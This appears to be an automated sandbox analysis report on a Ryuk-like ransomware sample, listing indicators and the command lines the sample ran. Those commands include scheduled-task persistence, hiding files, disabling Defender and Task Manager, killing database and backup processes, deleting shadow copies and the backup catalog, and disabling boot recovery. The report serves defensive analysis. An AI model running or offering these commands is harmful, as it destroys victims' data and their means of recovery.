Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	cmd.exe

pid	process
4880	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

pid	process
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3888	WMIC.exe
Token: SeSecurityPrivilege	3888	WMIC.exe
Token: SeTakeOwnershipPrivilege	3888	WMIC.exe
Token: SeLoadDriverPrivilege	3888	WMIC.exe
Token: SeSystemProfilePrivilege	3888	WMIC.exe
Token: SeSystemtimePrivilege	3888	WMIC.exe
Token: SeProfSingleProcessPrivilege	3888	WMIC.exe
Token: SeIncBasePriorityPrivilege	3888	WMIC.exe
Token: SeCreatePagefilePrivilege	3888	WMIC.exe
Token: SeBackupPrivilege	3888	WMIC.exe
Token: SeRestorePrivilege	3888	WMIC.exe
Token: SeShutdownPrivilege	3888	WMIC.exe
Token: SeDebugPrivilege	3888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3888	WMIC.exe
Token: SeRemoteShutdownPrivilege	3888	WMIC.exe
Token: SeUndockPrivilege	3888	WMIC.exe
Token: SeManageVolumePrivilege	3888	WMIC.exe
Token: 33	3888	WMIC.exe
Token: 34	3888	WMIC.exe
Token: 35	3888	WMIC.exe
Token: 36	3888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3888	WMIC.exe
Token: SeSecurityPrivilege	3888	WMIC.exe
Token: SeTakeOwnershipPrivilege	3888	WMIC.exe
Token: SeLoadDriverPrivilege	3888	WMIC.exe
Token: SeSystemProfilePrivilege	3888	WMIC.exe
Token: SeSystemtimePrivilege	3888	WMIC.exe
Token: SeProfSingleProcessPrivilege	3888	WMIC.exe
Token: SeIncBasePriorityPrivilege	3888	WMIC.exe
Token: SeCreatePagefilePrivilege	3888	WMIC.exe
Token: SeBackupPrivilege	3888	WMIC.exe
Token: SeRestorePrivilege	3888	WMIC.exe
Token: SeShutdownPrivilege	3888	WMIC.exe
Token: SeDebugPrivilege	3888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3888	WMIC.exe
Token: SeRemoteShutdownPrivilege	3888	WMIC.exe
Token: SeUndockPrivilege	3888	WMIC.exe
Token: SeManageVolumePrivilege	3888	WMIC.exe
Token: 33	3888	WMIC.exe
Token: 34	3888	WMIC.exe
Token: 35	3888	WMIC.exe
Token: 36	3888	WMIC.exe
Token: SeBackupPrivilege	1980	vssvc.exe
Token: SeRestorePrivilege	1980	vssvc.exe
Token: SeAuditPrivilege	1980	vssvc.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	4708	taskkill.exe
Token: SeSecurityPrivilege	3384	wevtutil.exe
Token: SeBackupPrivilege	3384	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	4448	wevtutil.exe
Token: SeBackupPrivilege	4448	wevtutil.exe
Token: SeSecurityPrivilege	4972	wevtutil.exe
Token: SeBackupPrivilege	4972	wevtutil.exe
Token: SeSecurityPrivilege	4120	wevtutil.exe
Token: SeBackupPrivilege	4120	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3928 wrote to memory of 2840	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2840	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 2840 wrote to memory of 4932	2840	cmd.exe	schtasks.exe
PID 2840 wrote to memory of 4932	2840	cmd.exe	schtasks.exe
PID 3928 wrote to memory of 4648	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 4648	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 444	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 444	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 1288	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 1288	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1288 wrote to memory of 612	1288	cmd.exe	schtasks.exe
PID 1288 wrote to memory of 612	1288	cmd.exe	schtasks.exe
PID 3928 wrote to memory of 2480	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2480	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 2480 wrote to memory of 4364	2480	cmd.exe	attrib.exe
PID 2480 wrote to memory of 4364	2480	cmd.exe	attrib.exe
PID 3928 wrote to memory of 1520	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 1520	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1520 wrote to memory of 1300	1520	cmd.exe	schtasks.exe
PID 1520 wrote to memory of 1300	1520	cmd.exe	schtasks.exe
PID 3928 wrote to memory of 740	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 740	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 740 wrote to memory of 4836	740	cmd.exe	schtasks.exe
PID 740 wrote to memory of 4836	740	cmd.exe	schtasks.exe
PID 3928 wrote to memory of 4124	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 4124	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 4124 wrote to memory of 3200	4124	cmd.exe	attrib.exe
PID 4124 wrote to memory of 3200	4124	cmd.exe	attrib.exe
PID 3928 wrote to memory of 1424	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 1424	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1424 wrote to memory of 2284	1424	cmd.exe	attrib.exe
PID 1424 wrote to memory of 2284	1424	cmd.exe	attrib.exe
PID 3928 wrote to memory of 2324	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2324	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 2324 wrote to memory of 4672	2324	cmd.exe	cmd.exe
PID 2324 wrote to memory of 4672	2324	cmd.exe	cmd.exe
PID 3928 wrote to memory of 2440	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2440	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2176	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2176	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 2176 wrote to memory of 2588	2176	cmd.exe	cmd.exe
PID 2176 wrote to memory of 2588	2176	cmd.exe	cmd.exe
PID 2440 wrote to memory of 1128	2440	cmd.exe	reg.exe
PID 2440 wrote to memory of 1128	2440	cmd.exe	reg.exe
PID 2176 wrote to memory of 2460	2176	cmd.exe	taskkill.exe
PID 2176 wrote to memory of 2460	2176	cmd.exe	taskkill.exe
PID 4672 wrote to memory of 2888	4672	cmd.exe	icacls.exe
PID 4672 wrote to memory of 2888	4672	cmd.exe	icacls.exe
PID 3928 wrote to memory of 4468	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 4468	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2384	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2384	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 4844	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 4844	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 2588 wrote to memory of 3364	2588	cmd.exe	taskkill.exe
PID 2588 wrote to memory of 3364	2588	cmd.exe	taskkill.exe
PID 3928 wrote to memory of 4400	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 4400	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2660	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 2660	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 1904	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 3928 wrote to memory of 1904	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1904 wrote to memory of 2040	1904	cmd.exe	reg.exe
PID 1904 wrote to memory of 2040	1904	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2284 attrib.exe
2980 attrib.exe
3756 attrib.exe
4364 attrib.exe
3200 attrib.exe

pid	process
2284	attrib.exe
2980	attrib.exe
3756	attrib.exe
4364	attrib.exe
3200	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:4648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F
3⤵
- Creates scheduled task(s)
PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:3200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:2384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4592

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:3720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:3348

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:4000

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
- Checks computer location settings
- Modifies registry class
PID:1068

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:5112

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:5116

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:3332

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:2132

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:3412

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:2012

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:4596

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:1928

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:4340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:2560

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1724

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:2588

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:4700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:3368

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:3212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:2208

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:4660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:2284

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
4⤵
PID:628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:4316

C:\Windows\system32\net.exe
